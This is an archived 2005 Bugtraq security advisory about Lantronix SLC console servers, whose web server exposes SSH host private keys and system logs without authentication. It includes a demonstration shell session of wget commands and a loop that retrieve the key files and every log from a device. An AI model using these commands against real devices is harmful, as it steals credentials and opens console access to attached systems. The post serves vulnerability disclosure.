lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 7 Jul 2005 09:19:29 -0000
From: spam@...etter.org
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in Lantronix SLC console server


Hi,

I stumbled on another bug during my review for console servers:


Summary:
Lantronix SecureLinx console server: Retrieval of ssh-private keys and system logfiles

Confirmed on SLC32, Software version: 2.0, 3.0
very likely on all models of SLC series (SLC8, 16, 32, 48)
www.lantronix.com


Details:
Lantronix console servers come with a mini_httpd which doesn't care much
in its configuration in the subdirectories of DocRoot about Unix acls.

Lantronix SLC' have their /etc/ssh directory below DocumentRoot.
One can easily retrieve ssh private keys through the network without
providing credentials, thus rendering ssh-encryption close to useless.
Also one can read logfiles through the network. Though the directory
is named /cifsshare/logs/ it contains system logs, potentially also
snifferlogs from serial console sessions.

Note that console servers provide administrative console access to
devices hooked up on their serial lines (up to 48)


Vulnerable Versions:
Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 (current)


Patches/Workarounds:
Bugfix pending. Vendor is working on 3.1, to be released in August.
Supposedly fixed by then.


"Exploit":

%%%%%%%%%%%%%%%%

myprompt:~ # ssh slc
The authenticity of host 'slc (192.168.50.205)' can't be established.
RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts.


Welcome to the SLC

login: root
Password: Connection to slc closed.
myprompt:~ # tail -1 .ssh/known_hosts
slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09
9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs
7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=
myprompt:~ # wget -q -O - https://slc/etc
<HTML><HEAD><TITLE>Index of etc/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of etc/</H4>
<PRE>
-rw-------    1 root          672 Jan  1  1970 ssh_host_dsa_key
-rw-r--r--    1 root          601 Jan  1  1970 ssh_host_dsa_key.pub
-rw-------    1 root          526 Jan  1  1970 ssh_host_key
-rw-r--r--    1 root          330 Jan  1  1970 ssh_host_key.pub
-rw-------    1 root          883 Jan  1  1970 ssh_host_rsa_key
-rw-r--r--    1 root          221 Jan  1  1970 ssh_host_rsa_key.pub
</PRE>
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c 02m
ay2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8
oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f
Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
-----BEGIN DSA PRIVATE KEY-----
-----END DSA PRIVATE KEY-----
myprompt:~ # wget -O - -q https://slc/cifsshare/logs/
<HTML><HEAD><TITLE>Index of cifsshare/logs/</TITLE></HEAD>
<BODY BGCOLOR="#99cc99"><H4>Index of cifsshare/logs/</H4>
<PRE>
lrwxrwxrwx  Oct  21  2004 authentication  <A HREF="-> ../../../var/log/secure">-> ../../../var/log/secure</A>
lrwxrwxrwx  Oct  21  2004 devports  <A HREF="-> ../../../var/log/devports">-> ../../../var/log/devports</A>
lrwxrwxrwx  Oct  21  2004 diag  <A HREF="-> ../../../var/log/diag">-> ../../../var/log/diag</A>
lrwxrwxrwx  Oct  21  2004 general  <A HREF="-> ../../../var/log/general">-> ../../../var/log/general</A>
lrwxrwxrwx  Oct  21  2004 network  <A HREF="-> ../../../var/log/network">-> ../../../var/log/network</A>
lrwxrwxrwx  Oct  21  2004 services  <A HREF="-> ../../../var/log/services">-> ../../../var/log/services</A>
lrwxrwxrwx  Oct  21  2004 sw  <A HREF="-> ../../../var/log/sw">-> ../../../var/log/sw</A>
</PRE>
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.15c 02may2001</A></ADDRESS>
</BODY></HTML>
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk '{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done

[.. too long to list it here, but you have enough phantasy ..]

%%%%%%%%%%%%%%%%


more to come.

Cheers,
        Dirk


--
Dr. Dirk Wetter                                  http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6  6584 8B6E 59C1 E41B 9153

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ